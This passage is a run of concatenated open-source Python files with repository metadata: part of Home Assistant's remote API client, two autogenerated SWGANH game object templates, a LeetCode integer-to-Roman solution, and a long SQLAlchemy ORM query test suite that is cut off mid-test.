req = api(METHOD_GET, URL_API_SERVICES)
return req.json() if req.status_code == 200 else {}
except (HomeAssistantError, ValueError):
# ValueError if req.json() can't parse the json
_LOGGER.exception("Got unexpected services result")
return {}
def call_service(api, domain, service, service_data=None):
"""Call a service at the remote API."""
try:
req = api(METHOD_POST,
URL_API_SERVICES_SERVICE.format(domain, service),
service_data)
if req.status_code != 200:
_LOGGER.error("Error calling service: %d - %s",
req.status_code, req.text)
except HomeAssistantError:
_LOGGER.exception("Error calling service")
|
mikaelboman/home-assistant
|
homeassistant/remote.py
|
Python
|
mit
| 15,888
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/clothing/shared_clothing_ith_backpack_field_06.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
anhstudios/swganh
|
data/scripts/templates/object/draft_schematic/clothing/shared_clothing_ith_backpack_field_06.py
|
Python
|
mit
| 468
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_imperial_officer_m_4.iff"
result.attribute_template_id = 9
result.stfName("npc_name","human_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
anhstudios/swganh
|
data/scripts/templates/object/mobile/shared_dressed_imperial_officer_m_4.py
|
Python
|
mit
| 453
|
# author: Fei Gao
#
# Integer To Roman
#
# Given an integer, convert it to a roman numeral.
# Input is guaranteed to be within the range from 1 to 3999.
class Solution:
# @return a string
def intToRoman(self, n):
roman_numeral_map = (
('M', 1000),
('CM', 900),
('D', 500),
('CD', 400),
('C', 100),
('XC', 90),
('L', 50),
('XL', 40),
('X', 10),
('IX', 9),
('V', 5),
('IV', 4),
('I', 1))
result = ''
for numeral, integer in roman_numeral_map:
while n >= integer:
result += numeral
n -= integer
return result
def main():
solver = Solution()
tests = []
for test in tests:
print(test)
print(' ->')
result = solver.intToRoman(test)
print(result)
print('~'*10)
pass
if __name__ == '__main__':
main()
pass
|
feigaochn/leetcode
|
p12_integer_to_roman.py
|
Python
|
mit
| 1,010
|
from sqlalchemy.testing import eq_, assert_raises, assert_raises_message
import operator
from sqlalchemy import *
from sqlalchemy import exc as sa_exc, util
from sqlalchemy.sql import compiler, table, column
from sqlalchemy.engine import default
from sqlalchemy.orm import *
from sqlalchemy.orm import attributes
from sqlalchemy.testing import eq_
import sqlalchemy as sa
from sqlalchemy import testing
from sqlalchemy.testing import AssertsCompiledSQL, engines
from sqlalchemy.testing.schema import Column
from test.orm import _fixtures
from sqlalchemy.testing import fixtures
from sqlalchemy.orm.util import join, outerjoin, with_parent
class QueryTest(_fixtures.FixtureTest):
run_setup_mappers = 'once'
run_inserts = 'once'
run_deletes = None
@classmethod
def setup_mappers(cls):
Node, composite_pk_table, users, Keyword, items, Dingaling, \
order_items, item_keywords, Item, User, dingalings, \
Address, keywords, CompositePk, nodes, Order, orders, \
addresses = cls.classes.Node, \
cls.tables.composite_pk_table, cls.tables.users, \
cls.classes.Keyword, cls.tables.items, \
cls.classes.Dingaling, cls.tables.order_items, \
cls.tables.item_keywords, cls.classes.Item, \
cls.classes.User, cls.tables.dingalings, \
cls.classes.Address, cls.tables.keywords, \
cls.classes.CompositePk, cls.tables.nodes, \
cls.classes.Order, cls.tables.orders, cls.tables.addresses
mapper(User, users, properties={
'addresses':relationship(Address, backref='user', order_by=addresses.c.id),
'orders':relationship(Order, backref='user', order_by=orders.c.id), # o2m, m2o
})
mapper(Address, addresses, properties={
'dingaling':relationship(Dingaling, uselist=False, backref="address") #o2o
})
mapper(Dingaling, dingalings)
mapper(Order, orders, properties={
'items':relationship(Item, secondary=order_items, order_by=items.c.id), #m2m
'address':relationship(Address), # m2o
})
mapper(Item, items, properties={
'keywords':relationship(Keyword, secondary=item_keywords) #m2m
})
mapper(Keyword, keywords)
mapper(Node, nodes, properties={
'children':relationship(Node,
backref=backref('parent', remote_side=[nodes.c.id])
)
})
mapper(CompositePk, composite_pk_table)
configure_mappers()
class QueryCorrelatesLikeSelect(QueryTest, AssertsCompiledSQL):
query_correlated = "SELECT users.name AS users_name, " \
"(SELECT count(addresses.id) AS count_1 FROM addresses " \
"WHERE addresses.user_id = users.id) AS anon_1 FROM users"
query_not_correlated = "SELECT users.name AS users_name, " \
"(SELECT count(addresses.id) AS count_1 FROM addresses, users " \
"WHERE addresses.user_id = users.id) AS anon_1 FROM users"
def test_as_scalar_select_auto_correlate(self):
addresses, users = self.tables.addresses, self.tables.users
query = select(
[func.count(addresses.c.id)],
addresses.c.user_id==users.c.id
).as_scalar()
query = select([users.c.name.label('users_name'), query])
self.assert_compile(query, self.query_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_select_explicit_correlate(self):
addresses, users = self.tables.addresses, self.tables.users
query = select(
[func.count(addresses.c.id)],
addresses.c.user_id==users.c.id
).correlate(users).as_scalar()
query = select([users.c.name.label('users_name'), query])
self.assert_compile(query, self.query_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_select_correlate_off(self):
addresses, users = self.tables.addresses, self.tables.users
query = select(
[func.count(addresses.c.id)],
addresses.c.user_id==users.c.id
).correlate(None).as_scalar()
query = select([ users.c.name.label('users_name'), query])
self.assert_compile(query, self.query_not_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_query_auto_correlate(self):
sess = create_session()
Address, User = self.classes.Address, self.classes.User
query = sess.query(func.count(Address.id))\
.filter(Address.user_id==User.id)\
.as_scalar()
query = sess.query(User.name, query)
self.assert_compile(query, self.query_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_query_explicit_correlate(self):
sess = create_session()
Address, User = self.classes.Address, self.classes.User
query = sess.query(func.count(Address.id))\
.filter(Address.user_id==User.id)\
.correlate(self.tables.users)\
.as_scalar()
query = sess.query(User.name, query)
self.assert_compile(query, self.query_correlated,
dialect=default.DefaultDialect()
)
def test_as_scalar_query_correlate_off(self):
sess = create_session()
Address, User = self.classes.Address, self.classes.User
query = sess.query(func.count(Address.id))\
.filter(Address.user_id==User.id)\
.correlate(None)\
.as_scalar()
query = sess.query(User.name, query)
self.assert_compile(query, self.query_not_correlated,
dialect=default.DefaultDialect()
)
class RawSelectTest(QueryTest, AssertsCompiledSQL):
"""compare a bunch of select() tests with the equivalent Query using
straight table/columns.
Results should be the same as Query should act as a select() pass-
thru for ClauseElement entities.
"""
__dialect__ = 'default'
def test_select(self):
addresses, users = self.tables.addresses, self.tables.users
sess = create_session()
self.assert_compile(sess.query(users).select_entity_from(
users.select()).with_labels().statement,
"SELECT users.id AS users_id, users.name AS users_name FROM users, "
"(SELECT users.id AS id, users.name AS name FROM users) AS anon_1",
)
self.assert_compile(sess.query(users, exists([1], from_obj=addresses)
).with_labels().statement,
"SELECT users.id AS users_id, users.name AS users_name, EXISTS "
"(SELECT 1 FROM addresses) AS anon_1 FROM users",
)
# a little tedious here, adding labels to work around Query's
# auto-labelling.
s = sess.query(addresses.c.id.label('id'),
addresses.c.email_address.label('email')).\
filter(addresses.c.user_id == users.c.id).correlate(users).\
statement.alias()
self.assert_compile(sess.query(users, s.c.email).select_entity_from(
users.join(s, s.c.id == users.c.id)
).with_labels().statement,
"SELECT users.id AS users_id, users.name AS users_name, "
"anon_1.email AS anon_1_email "
"FROM users JOIN (SELECT addresses.id AS id, "
"addresses.email_address AS email FROM addresses, users "
"WHERE addresses.user_id = users.id) AS anon_1 "
"ON anon_1.id = users.id",
)
x = func.lala(users.c.id).label('foo')
self.assert_compile(sess.query(x).filter(x == 5).statement,
"SELECT lala(users.id) AS foo FROM users WHERE "
"lala(users.id) = :param_1")
self.assert_compile(sess.query(func.sum(x).label('bar')).statement,
"SELECT sum(lala(users.id)) AS bar FROM users")
class FromSelfTest(QueryTest, AssertsCompiledSQL):
__dialect__ = 'default'
def test_filter(self):
User = self.classes.User
eq_(
[User(id=8), User(id=9)],
create_session().
query(User).
filter(User.id.in_([8,9])).
from_self().all()
)
eq_(
[User(id=8), User(id=9)],
create_session().query(User).
order_by(User.id).slice(1,3).
from_self().all()
)
eq_(
[User(id=8)],
list(
create_session().
query(User).
filter(User.id.in_([8,9])).
from_self().order_by(User.id)[0:1]
)
)
def test_join(self):
User, Address = self.classes.User, self.classes.Address
eq_(
[
(User(id=8), Address(id=2)),
(User(id=8), Address(id=3)),
(User(id=8), Address(id=4)),
(User(id=9), Address(id=5))
],
create_session().
query(User).
filter(User.id.in_([8,9])).
from_self().
join('addresses').
add_entity(Address).
order_by(User.id, Address.id).all()
)
def test_group_by(self):
Address = self.classes.Address
eq_(
create_session().query(Address.user_id,
func.count(Address.id).label('count')).\
group_by(Address.user_id).
order_by(Address.user_id).all(),
[(7, 1), (8, 3), (9, 1)]
)
eq_(
create_session().query(Address.user_id, Address.id).\
from_self(Address.user_id,
func.count(Address.id)).\
group_by(Address.user_id).
order_by(Address.user_id).all(),
[(7, 1), (8, 3), (9, 1)]
)
def test_having(self):
User = self.classes.User
s = create_session()
self.assert_compile(
s.query(User.id).group_by(User.id).having(User.id>5).
from_self(),
"SELECT anon_1.users_id AS anon_1_users_id FROM "
"(SELECT users.id AS users_id FROM users GROUP "
"BY users.id HAVING users.id > :id_1) AS anon_1"
)
def test_no_joinedload(self):
"""test that joinedloads are pushed outwards and not rendered in
subqueries."""
User = self.classes.User
s = create_session()
self.assert_compile(
s.query(User).options(joinedload(User.addresses)).
from_self().statement,
"SELECT anon_1.users_id, anon_1.users_name, addresses_1.id, "
"addresses_1.user_id, addresses_1.email_address FROM "
"(SELECT users.id AS users_id, users.name AS "
"users_name FROM users) AS anon_1 LEFT OUTER JOIN "
"addresses AS addresses_1 ON anon_1.users_id = "
"addresses_1.user_id ORDER BY addresses_1.id"
)
def test_aliases(self):
"""test that aliased objects are accessible externally to a from_self() call."""
User, Address = self.classes.User, self.classes.Address
s = create_session()
ualias = aliased(User)
eq_(
s.query(User, ualias).filter(User.id > ualias.id).
from_self(User.name, ualias.name).
order_by(User.name, ualias.name).all(),
[
('chuck', 'ed'),
('chuck', 'fred'),
('chuck', 'jack'),
('ed', 'jack'),
('fred', 'ed'),
('fred', 'jack')
]
)
eq_(
s.query(User, ualias).
filter(User.id > ualias.id).
from_self(User.name, ualias.name).
filter(ualias.name=='ed')\
.order_by(User.name, ualias.name).all(),
[('chuck', 'ed'), ('fred', 'ed')]
)
eq_(
s.query(User, ualias).
filter(User.id > ualias.id).
from_self(ualias.name, Address.email_address).
join(ualias.addresses).
order_by(ualias.name, Address.email_address).all(),
[
('ed', 'fred@fred.com'),
('jack', 'ed@bettyboop.com'),
('jack', 'ed@lala.com'),
('jack', 'ed@wood.com'),
('jack', 'fred@fred.com')]
)
def test_multiple_entities(self):
User, Address = self.classes.User, self.classes.Address
sess = create_session()
eq_(
sess.query(User, Address).\
filter(User.id==Address.user_id).\
filter(Address.id.in_([2, 5])).from_self().all(),
[
(User(id=8), Address(id=2)),
(User(id=9), Address(id=5))
]
)
eq_(
sess.query(User, Address).\
filter(User.id==Address.user_id).\
filter(Address.id.in_([2, 5])).\
from_self().\
options(joinedload('addresses')).first(),
(User(id=8,
addresses=[Address(), Address(), Address()]),
Address(id=2)),
)
def test_multiple_with_column_entities(self):
User = self.classes.User
sess = create_session()
eq_(
sess.query(User.id).from_self().\
add_column(func.count().label('foo')).\
group_by(User.id).\
order_by(User.id).\
from_self().all(),
[
(7,1), (8, 1), (9, 1), (10, 1)
]
)
class ColumnAccessTest(QueryTest, AssertsCompiledSQL):
"""test access of columns after _from_selectable has been applied"""
__dialect__ = 'default'
def test_from_self(self):
User = self.classes.User
sess = create_session()
q = sess.query(User).from_self()
self.assert_compile(
q.filter(User.name=='ed'),
"SELECT anon_1.users_id AS anon_1_users_id, anon_1.users_name AS "
"anon_1_users_name FROM (SELECT users.id AS users_id, users.name "
"AS users_name FROM users) AS anon_1 WHERE anon_1.users_name = "
":name_1"
)
def test_from_self_twice(self):
User = self.classes.User
sess = create_session()
q = sess.query(User).from_self(User.id, User.name).from_self()
self.assert_compile(
q.filter(User.name=='ed'),
"SELECT anon_1.anon_2_users_id AS anon_1_anon_2_users_id, "
"anon_1.anon_2_users_name AS anon_1_anon_2_users_name FROM "
"(SELECT anon_2.users_id AS anon_2_users_id, anon_2.users_name "
"AS anon_2_users_name FROM (SELECT users.id AS users_id, "
"users.name AS users_name FROM users) AS anon_2) AS anon_1 "
"WHERE anon_1.anon_2_users_name = :name_1"
)
def test_select_entity_from(self):
User = self.classes.User
sess = create_session()
q = sess.query(User)
q = sess.query(User).select_entity_from(q.statement)
self.assert_compile(
q.filter(User.name=='ed'),
"SELECT anon_1.id AS anon_1_id, anon_1.name AS anon_1_name "
"FROM (SELECT users.id AS id, users.name AS name FROM "
"users) AS anon_1 WHERE anon_1.name = :name_1"
)
def test_select_entity_from_no_entities(self):
User = self.classes.User
sess = create_session()
q = sess.query(User)
assert_raises_message(
sa.exc.ArgumentError,
r"A selectable \(FromClause\) instance is "
"expected when the base alias is being set",
sess.query(User).select_entity_from, User
)
def test_select_from_no_aliasing(self):
User = self.classes.User
sess = create_session()
q = sess.query(User)
q = sess.query(User).select_from(q.statement)
self.assert_compile(
q.filter(User.name=='ed'),
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users, (SELECT users.id AS id, users.name AS name FROM "
"users) AS anon_1 WHERE users.name = :name_1"
)
def test_anonymous_expression(self):
from sqlalchemy.sql import column
sess = create_session()
c1, c2 = column('c1'), column('c2')
q1 = sess.query(c1, c2).filter(c1 == 'dog')
q2 = sess.query(c1, c2).filter(c1 == 'cat')
q3 = q1.union(q2)
self.assert_compile(
q3.order_by(c1),
"SELECT anon_1.c1 AS anon_1_c1, anon_1.c2 "
"AS anon_1_c2 FROM (SELECT c1 AS c1, c2 AS c2 WHERE "
"c1 = :c1_1 UNION SELECT c1 AS c1, c2 AS c2 "
"WHERE c1 = :c1_2) AS anon_1 ORDER BY anon_1.c1"
)
def test_anonymous_expression_from_self_twice(self):
from sqlalchemy.sql import column
sess = create_session()
c1, c2 = column('c1'), column('c2')
q1 = sess.query(c1, c2).filter(c1 == 'dog')
q1 = q1.from_self().from_self()
self.assert_compile(
q1.order_by(c1),
"SELECT anon_1.anon_2_c1 AS anon_1_anon_2_c1, anon_1.anon_2_c2 AS "
"anon_1_anon_2_c2 FROM (SELECT anon_2.c1 AS anon_2_c1, anon_2.c2 "
"AS anon_2_c2 FROM (SELECT c1 AS c1, c2 AS c2 WHERE c1 = :c1_1) AS "
"anon_2) AS anon_1 ORDER BY anon_1.anon_2_c1"
)
def test_anonymous_expression_union(self):
from sqlalchemy.sql import column
sess = create_session()
c1, c2 = column('c1'), column('c2')
q1 = sess.query(c1, c2).filter(c1 == 'dog')
q2 = sess.query(c1, c2).filter(c1 == 'cat')
q3 = q1.union(q2)
self.assert_compile(
q3.order_by(c1),
"SELECT anon_1.c1 AS anon_1_c1, anon_1.c2 "
"AS anon_1_c2 FROM (SELECT c1 AS c1, c2 AS c2 WHERE "
"c1 = :c1_1 UNION SELECT c1 AS c1, c2 AS c2 "
"WHERE c1 = :c1_2) AS anon_1 ORDER BY anon_1.c1"
)
def test_table_anonymous_expression_from_self_twice(self):
from sqlalchemy.sql import column, table
sess = create_session()
t1 = table('t1', column('c1'), column('c2'))
q1 = sess.query(t1.c.c1, t1.c.c2).filter(t1.c.c1 == 'dog')
q1 = q1.from_self().from_self()
self.assert_compile(
q1.order_by(t1.c.c1),
"SELECT anon_1.anon_2_t1_c1 AS anon_1_anon_2_t1_c1, anon_1.anon_2_t1_c2 "
"AS anon_1_anon_2_t1_c2 FROM (SELECT anon_2.t1_c1 AS anon_2_t1_c1, "
"anon_2.t1_c2 AS anon_2_t1_c2 FROM (SELECT t1.c1 AS t1_c1, t1.c2 "
"AS t1_c2 FROM t1 WHERE t1.c1 = :c1_1) AS anon_2) AS anon_1 ORDER BY "
"anon_1.anon_2_t1_c1"
)
def test_anonymous_labeled_expression(self):
from sqlalchemy.sql import column
sess = create_session()
c1, c2 = column('c1'), column('c2')
q1 = sess.query(c1.label('foo'), c2.label('bar')).filter(c1 == 'dog')
q2 = sess.query(c1.label('foo'), c2.label('bar')).filter(c1 == 'cat')
q3 = q1.union(q2)
self.assert_compile(
q3.order_by(c1),
"SELECT anon_1.foo AS anon_1_foo, anon_1.bar AS anon_1_bar FROM "
"(SELECT c1 AS foo, c2 AS bar WHERE c1 = :c1_1 UNION SELECT "
"c1 AS foo, c2 AS bar WHERE c1 = :c1_2) AS anon_1 ORDER BY anon_1.foo"
)
def test_anonymous_expression_plus_aliased_join(self):
"""test that the 'dont alias non-ORM' rule remains for other
kinds of aliasing when _from_selectable() is used."""
User = self.classes.User
Address = self.classes.Address
addresses = self.tables.addresses
sess = create_session()
q1 = sess.query(User.id).filter(User.id > 5)
q1 = q1.from_self()
q1 = q1.join(User.addresses, aliased=True).\
order_by(User.id, Address.id, addresses.c.id)
self.assert_compile(
q1,
"SELECT anon_1.users_id AS anon_1_users_id "
"FROM (SELECT users.id AS users_id FROM users "
"WHERE users.id > :id_1) AS anon_1 JOIN addresses AS addresses_1 "
"ON anon_1.users_id = addresses_1.user_id "
"ORDER BY anon_1.users_id, addresses_1.id, addresses.id"
)
class AddEntityEquivalenceTest(fixtures.MappedTest, AssertsCompiledSQL):
run_setup_mappers = 'once'
@classmethod
def define_tables(cls, metadata):
Table('a', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('name', String(50)),
Column('type', String(20)),
Column('bid', Integer, ForeignKey('b.id'))
)
Table('b', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('name', String(50)),
Column('type', String(20))
)
Table('c', metadata,
Column('id', Integer, ForeignKey('b.id'), primary_key=True),
Column('age', Integer)
)
Table('d', metadata,
Column('id', Integer, ForeignKey('a.id'), primary_key=True),
Column('dede', Integer)
)
@classmethod
def setup_classes(cls):
a, c, b, d = (cls.tables.a,
cls.tables.c,
cls.tables.b,
cls.tables.d)
class A(cls.Comparable):
pass
class B(cls.Comparable):
pass
class C(B):
pass
class D(A):
pass
mapper(A, a,
polymorphic_identity='a',
polymorphic_on=a.c.type,
with_polymorphic= ('*', None),
properties={
'link':relation( B, uselist=False, backref='back')
})
mapper(B, b,
polymorphic_identity='b',
polymorphic_on=b.c.type,
with_polymorphic= ('*', None)
)
mapper(C, c, inherits=B, polymorphic_identity='c')
mapper(D, d, inherits=A, polymorphic_identity='d')
@classmethod
def insert_data(cls):
A, C, B = (cls.classes.A,
cls.classes.C,
cls.classes.B)
sess = create_session()
sess.add_all([
B(name='b1'),
A(name='a1', link= C(name='c1',age=3)),
C(name='c2',age=6),
A(name='a2')
])
sess.flush()
def test_add_entity_equivalence(self):
A, C, B = (self.classes.A,
self.classes.C,
self.classes.B)
sess = create_session()
for q in [
sess.query( A,B).join( A.link),
sess.query( A).join( A.link).add_entity(B),
]:
eq_(
q.all(),
[(
A(bid=2, id=1, name='a1', type='a'),
C(age=3, id=2, name='c1', type='c')
)]
)
for q in [
sess.query( B,A).join( B.back),
sess.query( B).join( B.back).add_entity(A),
sess.query( B).add_entity(A).join( B.back)
]:
eq_(
q.all(),
[(
C(age=3, id=2, name='c1', type='c'),
A(bid=2, id=1, name='a1', type='a')
)]
)
class InstancesTest(QueryTest, AssertsCompiledSQL):
def test_from_alias(self):
User, addresses, users = (self.classes.User,
self.tables.addresses,
self.tables.users)
query = users.select(users.c.id==7).\
union(users.select(users.c.id>7)).\
alias('ulist').\
outerjoin(addresses).\
select(use_labels=True,
order_by=['ulist.id', addresses.c.id])
sess =create_session()
q = sess.query(User)
def go():
l = list(q.options(contains_alias('ulist'),
contains_eager('addresses')).\
instances(query.execute()))
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
l = q.options(contains_alias('ulist'),
contains_eager('addresses')).\
from_statement(query).all()
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
# better way. use select_entity_from()
def go():
l = sess.query(User).select_entity_from(query).\
options(contains_eager('addresses')).all()
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
# same thing, but alias addresses, so that the adapter
# generated by select_entity_from() is wrapped within
# the adapter created by contains_eager()
adalias = addresses.alias()
query = users.select(users.c.id==7).\
union(users.select(users.c.id>7)).\
alias('ulist').\
outerjoin(adalias).\
select(use_labels=True,
order_by=['ulist.id', adalias.c.id])
def go():
l = sess.query(User).select_entity_from(query).\
options(contains_eager('addresses', alias=adalias)).all()
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager(self):
users, addresses, User = (self.tables.users,
self.tables.addresses,
self.classes.User)
sess = create_session()
# test that contains_eager suppresses the normal outer join rendering
q = sess.query(User).outerjoin(User.addresses).\
options(contains_eager(User.addresses)).\
order_by(User.id, addresses.c.id)
self.assert_compile(q.with_labels().statement,
'SELECT addresses.id AS addresses_id, '
'addresses.user_id AS addresses_user_id, '
'addresses.email_address AS '
'addresses_email_address, users.id AS '
'users_id, users.name AS users_name FROM '
'users LEFT OUTER JOIN addresses ON '
'users.id = addresses.user_id ORDER BY '
'users.id, addresses.id',
dialect=default.DefaultDialect())
def go():
assert self.static.user_address_result == q.all()
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
adalias = addresses.alias()
q = sess.query(User).\
select_entity_from(users.outerjoin(adalias)).\
options(contains_eager(User.addresses, alias=adalias)).\
order_by(User.id, adalias.c.id)
def go():
eq_(self.static.user_address_result, q.order_by(User.id).all())
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
selectquery = users.\
outerjoin(addresses).\
select(users.c.id<10,
use_labels=True,
order_by=[users.c.id, addresses.c.id])
q = sess.query(User)
def go():
l = list(q.options(
contains_eager('addresses')
).instances(selectquery.execute()))
assert self.static.user_address_result[0:3] == l
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
l = list(q.options(
contains_eager(User.addresses)
).instances(selectquery.execute()))
assert self.static.user_address_result[0:3] == l
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
l = q.options(
contains_eager('addresses')
).from_statement(selectquery).all()
assert self.static.user_address_result[0:3] == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_string_alias(self):
addresses, users, User = (self.tables.addresses,
self.tables.users,
self.classes.User)
sess = create_session()
q = sess.query(User)
adalias = addresses.alias('adalias')
selectquery = users.outerjoin(adalias).\
select(use_labels=True,
order_by=[users.c.id, adalias.c.id])
# string alias name
def go():
l = list(q.options(
contains_eager('addresses', alias="adalias")
).instances(selectquery.execute()))
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_aliased_instances(self):
addresses, users, User = (self.tables.addresses,
self.tables.users,
self.classes.User)
sess = create_session()
q = sess.query(User)
adalias = addresses.alias('adalias')
selectquery = users.outerjoin(adalias).\
select(use_labels=True,
order_by=[users.c.id, adalias.c.id])
# expression.Alias object
def go():
l = list(q.options(
contains_eager('addresses', alias=adalias)
).instances(selectquery.execute()))
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_aliased(self):
User, Address = self.classes.User, self.classes.Address
sess = create_session()
q = sess.query(User)
# Aliased object
adalias = aliased(Address)
def go():
l = q.options(
contains_eager('addresses', alias=adalias)
).\
outerjoin(adalias, User.addresses).\
order_by(User.id, adalias.id)
assert self.static.user_address_result == l.all()
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_multi_string_alias(self):
orders, items, users, order_items, User = (self.tables.orders,
self.tables.items,
self.tables.users,
self.tables.order_items,
self.classes.User)
sess = create_session()
q = sess.query(User)
oalias = orders.alias('o1')
ialias = items.alias('i1')
query = users.outerjoin(oalias).\
outerjoin(order_items).\
outerjoin(ialias).\
select(use_labels=True).\
order_by(users.c.id, oalias.c.id, ialias.c.id)
# test using string alias with more than one level deep
def go():
l = list(q.options(
contains_eager('orders', alias='o1'),
contains_eager('orders.items', alias='i1')
).instances(query.execute()))
assert self.static.user_order_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_multi_alias(self):
orders, items, users, order_items, User = (self.tables.orders,
self.tables.items,
self.tables.users,
self.tables.order_items,
self.classes.User)
sess = create_session()
q = sess.query(User)
oalias = orders.alias('o1')
ialias = items.alias('i1')
query = users.outerjoin(oalias).\
outerjoin(order_items).\
outerjoin(ialias).\
select(use_labels=True).\
order_by(users.c.id, oalias.c.id, ialias.c.id)
# test using Alias with more than one level deep
def go():
l = list(q.options(
contains_eager('orders', alias=oalias),
contains_eager('orders.items', alias=ialias)
).instances(query.execute()))
assert self.static.user_order_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_multi_aliased(self):
Item, User, Order = (self.classes.Item,
self.classes.User,
self.classes.Order)
sess = create_session()
q = sess.query(User)
# test using Aliased with more than one level deep
oalias = aliased(Order)
ialias = aliased(Item)
def go():
l = q.options(
contains_eager(User.orders, alias=oalias),
contains_eager(User.orders, Order.items, alias=ialias)
).\
outerjoin(oalias, User.orders).\
outerjoin(ialias, oalias.items).\
order_by(User.id, oalias.id, ialias.id)
assert self.static.user_order_result == l.all()
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_chaining(self):
"""test that contains_eager() 'chains' by default."""
Dingaling, User, Address = (self.classes.Dingaling,
self.classes.User,
self.classes.Address)
sess = create_session()
q = sess.query(User).\
join(User.addresses).\
join(Address.dingaling).\
options(
contains_eager(User.addresses, Address.dingaling),
)
def go():
eq_(
q.all(),
# note we only load the Address records that
# have a Dingaling here due to using the inner
# join for the eager load
[
User(name='ed', addresses=[
Address(email_address='ed@wood.com',
dingaling=Dingaling(data='ding 1/2')),
]),
User(name='fred', addresses=[
Address(email_address='fred@fred.com',
dingaling=Dingaling(data='ding 2/5'))
])
]
)
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_chaining_aliased_endpoint(self):
"""test that contains_eager() 'chains' by default and supports
an alias at the end."""
Dingaling, User, Address = (self.classes.Dingaling,
self.classes.User,
self.classes.Address)
sess = create_session()
da = aliased(Dingaling, name="foob")
q = sess.query(User).\
join(User.addresses).\
join(da, Address.dingaling).\
options(
contains_eager(User.addresses, Address.dingaling, alias=da),
)
def go():
eq_(
q.all(),
# note we only load the Address records that
# have a Dingaling here due to using the inner
# join for the eager load
[
User(name='ed', addresses=[
Address(email_address='ed@wood.com',
dingaling=Dingaling(data='ding 1/2')),
]),
User(name='fred', addresses=[
Address(email_address='fred@fred.com',
dingaling=Dingaling(data='ding 2/5'))
])
]
)
self.assert_sql_count(testing.db, go, 1)
def test_mixed_eager_contains_with_limit(self):
Order, User, Address = (self.classes.Order,
self.classes.User,
self.classes.Address)
sess = create_session()
q = sess.query(User)
def go():
# outerjoin to User.orders, offset 1/limit 2 so we get user
# 7 + second two orders. then joinedload the addresses.
# User + Order columns go into the subquery, address left
# outer joins to the subquery, joinedloader for User.orders
# applies context.adapter to result rows. This was
# [ticket:1180].
l = \
q.outerjoin(User.orders).options(joinedload(User.addresses),
contains_eager(User.orders)).order_by(User.id,
Order.id).offset(1).limit(2).all()
eq_(l, [User(id=7,
addresses=[Address(email_address='jack@bean.com',
user_id=7, id=1)], name='jack',
orders=[Order(address_id=1, user_id=7,
description='order 3', isopen=1, id=3),
Order(address_id=None, user_id=7, description='order 5'
, isopen=0, id=5)])])
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
# same as above, except Order is aliased, so two adapters
# are applied by the eager loader
oalias = aliased(Order)
l = q.outerjoin(oalias, User.orders).\
options(joinedload(User.addresses),
contains_eager(User.orders, alias=oalias)).\
order_by(User.id, oalias.id).\
offset(1).limit(2).all()
eq_(l, [User(id=7,
addresses=[Address(email_address='jack@bean.com',
user_id=7, id=1)], name='jack',
orders=[Order(address_id=1, user_id=7,
description='order 3', isopen=1, id=3),
Order(address_id=None, user_id=7, description='order 5'
, isopen=0, id=5)])])
self.assert_sql_count(testing.db, go, 1)
class MixedEntitiesTest(QueryTest, AssertsCompiledSQL):
__dialect__ = 'default'
def test_values(self):
Address, users, User = (self.classes.Address,
self.tables.users,
self.classes.User)
sess = create_session()
assert list(sess.query(User).values()) == list()
sel = users.select(User.id.in_([7, 8])).alias()
q = sess.query(User)
q2 = q.select_entity_from(sel).values(User.name)
eq_(list(q2), [('jack',), ('ed',)])
q = sess.query(User)
q2 = q.order_by(User.id).\
values(User.name, User.name + " " + cast(User.id, String(50)))
eq_(
list(q2),
[('jack', 'jack 7'), ('ed', 'ed 8'),
('fred', 'fred 9'), ('chuck', 'chuck 10')]
)
q2 = q.join('addresses').\
filter(User.name.like('%e%')).\
order_by(User.id, Address.id).\
values(User.name, Address.email_address)
eq_(list(q2),
[('ed', 'ed@wood.com'), ('ed', 'ed@bettyboop.com'),
('ed', 'ed@lala.com'), ('fred', 'fred@fred.com')])
q2 = q.join('addresses').\
filter(User.name.like('%e%')).\
order_by(desc(Address.email_address)).\
slice(1, 3).values(User.name, Address.email_address)
eq_(list(q2), [('ed', 'ed@wood.com'), ('ed', 'ed@lala.com')])
adalias = aliased(Address)
q2 = q.join(adalias, 'addresses').\
filter(User.name.like('%e%')).order_by(adalias.email_address).\
values(User.name, adalias.email_address)
eq_(list(q2), [('ed', 'ed@bettyboop.com'), ('ed', 'ed@lala.com'),
